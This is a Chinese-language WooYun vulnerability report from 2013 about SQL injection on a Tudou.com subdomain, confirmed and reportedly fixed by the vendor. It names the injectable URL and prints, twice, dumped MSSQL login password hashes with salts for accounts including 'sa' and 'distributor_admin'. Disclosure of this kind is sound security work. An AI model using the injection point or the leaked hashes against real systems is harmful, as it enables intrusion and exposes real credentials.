当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035667

漏洞标题:土豆网某分站SQL注入漏洞一枚(已跑出多个库)

相关厂商:土豆网

漏洞作者: Hxai11

提交时间:2013-08-30 12:13

修复时间:2013-10-14 12:13

公开时间:2013-10-14 12:13

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-30: 细节已通知厂商并且等待厂商处理中
2013-08-31: 厂商已经确认,细节仅向厂商公开
2013-09-10: 细节向核心白帽子及相关领域专家公开
2013-09-20: 细节向普通白帽子公开
2013-09-30: 细节向实习白帽子公开
2013-10-14: 细节向公众公开

简要描述:

注入怪物来了!

详细说明:

注入地址:
http://whitevitality.tudou.com/usercontrols/uc_videosingle.aspx?store_id=5401country=l06&type=M&class=M04

0VC4B@~GYF(KL%UCR[}6ODD.jpg


}2~$[}WBGTO_KCN`WW87R%R.jpg


09FH[3[9PH1{8C4RBN6ORQV.jpg


)1PM39JL[{Y0C)U054]K{HR.jpg


database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
header: 0x0100
salt: 3869d680
mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] distributor_admin [1]:
password hash: 0x0100f48bf5f4f43c513efc3cb12ca62117f012a9335d9e84887b
header: 0x0100
salt: f48bf5f4
mixedcase: f43c513efc3cb12ca62117f012a9335d9e84887b
[*] FunMovie [1]:
password hash: 0x0100532784ebdd98657b645dcc279c5e3bb5d70e7a561ea40094
header: 0x0100
salt: 532784eb
mixedcase: dd98657b645dcc279c5e3bb5d70e7a561ea40094
[*] lion [1]:
password hash: 0x01000d9bedfd1958fdb811cc5c5dfa7efae80d25113d3a925c4d
header: 0x0100
salt: 0d9bedfd
mixedcase: 1958fdb811cc5c5dfa7efae80d25113d3a925c4d
[*] momait2 [1]:
password hash: 0x01001fb74c20ccac52636e0da59cf86c435e5f7ece7fb13e8d87
header: 0x0100
salt: 1fb74c20
mixedcase: ccac52636e0da59cf86c435e5f7ece7fb13e8d87
[*] momait4 [1]:
password hash: 0x010086cdfaf8a5bc7503b6c969ad75636c904e5c240b368e57cc
header: 0x0100
salt: 86cdfaf8
mixedcase: a5bc7503b6c969ad75636c904e5c240b368e57cc
[*] sa [1]:
password hash: 0x010056049b0ea82de135ddd10e3772090a673599c95ff8f3a421
header: 0x0100
salt: 56049b0e
mixedcase: a82de135ddd10e3772090a673599c95ff8f3a421

漏洞证明:

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
header: 0x0100
salt: 3869d680
mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] distributor_admin [1]:
password hash: 0x0100f48bf5f4f43c513efc3cb12ca62117f012a9335d9e84887b
header: 0x0100
salt: f48bf5f4
mixedcase: f43c513efc3cb12ca62117f012a9335d9e84887b
[*] FunMovie [1]:
password hash: 0x0100532784ebdd98657b645dcc279c5e3bb5d70e7a561ea40094
header: 0x0100
salt: 532784eb
mixedcase: dd98657b645dcc279c5e3bb5d70e7a561ea40094
[*] lion [1]:
password hash: 0x01000d9bedfd1958fdb811cc5c5dfa7efae80d25113d3a925c4d
header: 0x0100
salt: 0d9bedfd
mixedcase: 1958fdb811cc5c5dfa7efae80d25113d3a925c4d
[*] momait2 [1]:
password hash: 0x01001fb74c20ccac52636e0da59cf86c435e5f7ece7fb13e8d87
header: 0x0100
salt: 1fb74c20
mixedcase: ccac52636e0da59cf86c435e5f7ece7fb13e8d87
[*] momait4 [1]:
password hash: 0x010086cdfaf8a5bc7503b6c969ad75636c904e5c240b368e57cc
header: 0x0100
salt: 86cdfaf8
mixedcase: a5bc7503b6c969ad75636c904e5c240b368e57cc
[*] sa [1]:
password hash: 0x010056049b0ea82de135ddd10e3772090a673599c95ff8f3a421
header: 0x0100
salt: 56049b0e
mixedcase: a82de135ddd10e3772090a673599c95ff8f3a421

修复方案:

防注入

版权声明:转载请注明来源 Hxai11@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-08-31 13:36

厂商回复:

之前合作项目,已处理,多谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-30 16:40 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @土豆网 查水表啦~~